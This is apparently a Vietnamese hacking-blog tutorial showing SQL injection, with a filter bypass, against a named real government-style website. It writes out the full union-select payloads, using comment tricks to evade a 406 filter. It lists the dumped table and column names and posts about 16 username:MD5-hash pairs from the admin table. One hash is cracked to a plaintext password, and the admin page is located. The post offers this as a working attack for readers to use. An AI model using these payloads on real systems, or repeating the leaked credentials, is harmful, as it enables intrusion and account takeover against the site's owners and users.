Tuts SQL Injection Bypass!!

Hôm nay mình sẽ làm bài tut hướng dẫn các bạn khai thác sql bypass.-victim: http://www.vienthuysan2.org.vn
- đầu tiên check lỗi: http://www.vienthuysan2.org.vn/?do=news&pid=1' =>>lỗi
-khai thác: ta dùng order by
+http://www.vienthuysan2.org.vn/?do=news&pid=1 order by 6 =>không hiện gì. thử cách khác:
+http://www.vienthuysan2.org.vn/?do=news&pid=1 order by 6-- =>>hiện nội dung. ta order by 7-- sẽ không hiện gì cả. nghĩa là đã bypass đc rồi đó ^.^. tiếp tục khai thác
-http://www.vienthuysan2.org.vn/?do=news&pid=-1 union select 1,2,3,4,5,6-- => lỗi 406 NOT ACCEPT. cách này không được thì ta thử bypass cách khác xem:
+http://www.vienthuysan2.org.vn/?do=news&pid=-1 /*!union*/ select 1,2,3,4,5,6-- =>>OK đã sổ lỗi ^.^ tiếp tục khai thác
+http://www.vienthuysan2.org.vn/?do=news&pid=-1 /*!union*/ select 1,2,version(),4,5,6-- =>tìm version
+http://www.vienthuysan2.org.vn/?do=news&pid=-1 /*!Union*/ select 1,2,/*!group_concat(table_name)*/,4,5,6 /*!from*/ information_schema.tables where table_schema=database()--
=> ra đc cái tables: admin,banners,departments,departmentscate,internalnews,intro,library,librarycate,links,linkscate,news,newscate,units
-ta đổi table: admin thành hex , admin =61646d696e
-Tiếp tục lấy columns: http://www.vienthuysan2.org.vn/?do=news&pid=-1 /*!Union*/ select 1,2,/*!group_concat(column_name)*/,4,5,6 /*!from*/
information_schema.columns where /*!table_name*/=0x61646d696e--


=> ta được columns của table admin: id,username,password,name,email,right,units
- tiếp tục: http://www.vienthuysan2.org.vn/?do=news&pid=-1 /*!Union*/ select 1,2,/*!group_concat(username,0x3a,password)*/,4,5,6 /*!from*/ admin--

=> ta được user pass: nguyen:ea13eeea94b4a198b81105fd0096ef21,vienthuysan2:21232f297a57a5a743894a0e4a801fc3,nvhao:e10adc3949ba59abbe56e057f20f883e,nhkhiem:ccdc37f88c68db87f35c67cae9de5535,nvdung:d41d8cd98f00b204e9800998ecf8427e,vvdung:86dcc96ec1e3157b776a6c54e9501571,bnhuy:e10adc3949ba59abbe56e057f20f883e,lhtai:65743c19aaae401935f6ee0ba15265db,hoangtien:80c2681cf6c324edf788b38134dfcb3f,ttphi:e10adc3949ba59abbe56e057f20f883e,dvhoang:e10adc3949ba59abbe56e057f20f883e,vmson:e10adc3949ba59abbe56e057f20f883e,ntntinh:e10adc3949ba59abbe56e057f20f883e,nqtam:9cd6038beccfebec416571e678a7e86e,thuytien:ecef38ca5c37b6615e1230e35115364c,admin:86dcc96ec1e3157b776a6c54e9501571


-ở đây mình chọn user: vienthuysan2:21232f297a57a5a743894a0e4a801fc3 giải mã ra ta được: vienthuysan2:admin


-tìm link admin: http://www.vienthuysan2.org.vn/admin.php ( dùng tool scan link admin hoặc havji nhé)
****Bài tut đến đây là kết thúc. đây là 1 bài về cách bypass. mong sẽ giúp được các bạn có thêm kinh nghiệm trong việc khai thác!    

Chú Ý:

Coppy phải ghi rõ nguồn Hacking Security
 

Copyright © 123 H4ck' Blog. Cung cấp bởi Blogger